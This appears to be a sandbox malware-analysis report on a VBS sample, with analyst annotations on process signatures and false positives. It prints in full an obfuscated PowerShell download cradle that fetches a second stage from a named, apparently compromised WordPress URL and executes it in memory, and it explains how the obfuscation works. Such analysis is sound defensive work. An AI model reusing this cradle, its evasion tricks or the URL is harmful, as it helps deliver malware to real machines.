Analysis
max time kernel: 4294181s (not a real 49-day run; the value is within 2^32 ms of zero and is almost certainly a wrapped 32-bit millisecond counter)
max time network: 124s
platform: windows7_x64
resource: win7-20220311-en
submitted: 12-04-2022 18:38
Static task: static1
Behavioral task: behavioral1
Sample: AFKCVLKLDDLZAVUPDONGW.vbs
Resource: win7-20220311-en
0 signatures, 0 seconds
General
Target: AFKCVLKLDDLZAVUPDONGW.vbs
Size: 2KB
MD5: 24ad735b3a8d200c611b18b836acaf53
SHA1: 96bb5edf6154e46eb01a56a31b512790d293e367
SHA256: bbcb131bea858c4fb62a325f5bc4788e3ca18e790c6dd698ee6c6e870ea45636
SHA512: 27b271bad8bed68d9a3b6ea986b7450f22a4c09831f4cb9a5588eada8246fa19695e82848a92087ba5564f6f3787d097dc91330df103deca64886f82bbbc7a65
Score: 10/10
Malware Config
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
pid: 1236 | pid_target: 988 | process: powershell.exe
Caveat: elsewhere in the report pid 1236 is powershell.exe, and in the process tree below it sits at depth 1 beside WScript.exe rather than under it. Together with the flagged parent being the WMI provider host, that points to the script starting PowerShell through WMI rather than a direct child launch. The VBS body is not reproduced in this report, so this is an inference from the tree, not an observed call.

Drops file in System32 directory (1 IoC)
description: File opened for modification
ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
process: powershell.exe
Caveat: the path contains a literal, unexpanded %ProgramData% component resolved relative to System32 (the host's working directory), and the file is the PowerShell host's own Start Menu shortcut. This hit shows up in practically every sandbox run that launches powershell.exe; it is not evidence that the sample wrote anything under System32 or established persistence.

Suspicious behavior: EnumeratesProcesses (1 IoC)
pid: 1236 | process: powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description: Token: SeDebugPrivilege | pid: 1236 | process: powershell.exe
Both of these are attributed to the first-stage powershell.exe host. No further process appears in the tree, so nothing in this section reflects the behaviour of the second stage the cradle requests.
Processes

C:\Windows\System32\WScript.exe (depth 1)
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AFKCVLKLDDLZAVUPDONGW.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 1)
powershell $FTCKPRWRCANOIWXIDCVVNS = '[S\$3+0%!#70%*4{^]6\16]2EM.I@}%$%})<_{3+#![-&9^$##MREAdER]'.Replace('\$3+0%!#70%*4{^]6\16]2','ySt').Replace('@}%$%})<_{3+#![-&9^$##','O.StREA');$OPDAXIYFOCWNKVANDBYRRQ = ($FTCKPRWRCANOIWXIDCVVNS -Join '')| .('{1}{0}'-f'EX','I');$ICTZSOZQNDQVCJZDIABYPE = '[SyS93!=@^*/[*782[\$\-%={%T.W8(11[8<6/]5*868{9{#+06ST]'.Replace('93!=@^*/[*782[\$\-%={%','TEm.NE').Replace('8(11[8<6/]5*868{9{#+06','EbREquE');$IOGBGSTBSXHOWZHWGCXIVP = ($ICTZSOZQNDQVCJZDIABYPE -Join '')| .('{1}{0}'-f'EX','I');$BGWUTNDKYVDYGXTZZWXWNT = 'Cr)4-$<1^%^=*^55-/_636[2TE'.Replace(')4-$<1^%^=*^55-/_636[2','Ea');$OJLQEURWLWYVLQCIHYUUFD = 'GE5={{-]1==#)-+8=5%64%&}onSE'.Replace('5={{-]1==#)-+8=5%64%&}','tRESp');$SCYACXEAKXLAYHCTCLITJG = 'GE<-4[5]9+9}2/}{\7(9*!07REam'.Replace('<-4[5]9+9}2/}{\7(9*!07','tRESponSESt');$QSPTVKHFZAGSXGZPPOBDFP = 'RE262]_&$84<]*&!={=&-1%)nD'.Replace('262]_&$84<]*&!={=&-1%)','aDToE'); .('{1}{0}'-f'EX','I')($OPDAXIYFOCWNKVANDBYRRQ::new($IOGBGSTBSXHOWZHWGCXIVP::$BGWUTNDKYVDYGXTZZWXWNT('https://linkvilleplayers.org/wp-admin/Server.txt').$OJLQEURWLWYVLQCIHYUUFD().$SCYACXEAKXLAYHCTCLITJG()).$QSPTVKHFZAGSXGZPPOBDFP())
Signatures on this process:
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

Reading the command line: every literal is a real identifier padded with a run of junk characters that a chained .Replace() strips out at run time, and the Invoke-Expression alias is assembled with the format operator ('{1}{0}' -f 'EX','I' yields IEX) so the string IEX never appears in the argument. The .Replace() chains resolve to [System.IO.StreamReader], [System.Net.WebRequest], Create, GetResponse, GetResponseStream and ReadToEnd. Each type-name string is piped into IEX to turn it into a type object, and the final statement creates a WebRequest for https://linkvilleplayers.org/wp-admin/Server.txt, reads the response body into a string and hands that string to IEX. This is a fileless download cradle for a second stage; the /wp-admin/ path indicates a WordPress install, which is typical of payloads hosted on a compromised site. The Network section of this extract is empty, so whether Server.txt was actually retrieved during the run is not shown here.
Network
Downloads (memory dumps of pid 1236, powershell.exe)
memory/1236-54-0x000007FEFB901000-0x000007FEFB903000-memory.dmp: 8KB
memory/1236-55-0x0000000002830000-0x0000000002832000-memory.dmp: 8KB
memory/1236-57-0x0000000002834000-0x0000000002837000-memory.dmp: 12KB
memory/1236-58-0x0000000002832000-0x0000000002834000-memory.dmp: 8KB
memory/1236-56-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp: 11.4MB
memory/1236-59-0x000000001B860000-0x000000001BB5F000-memory.dmp: 3.0MB
memory/1236-60-0x000000000283B000-0x000000000285A000-memory.dmp: 124KB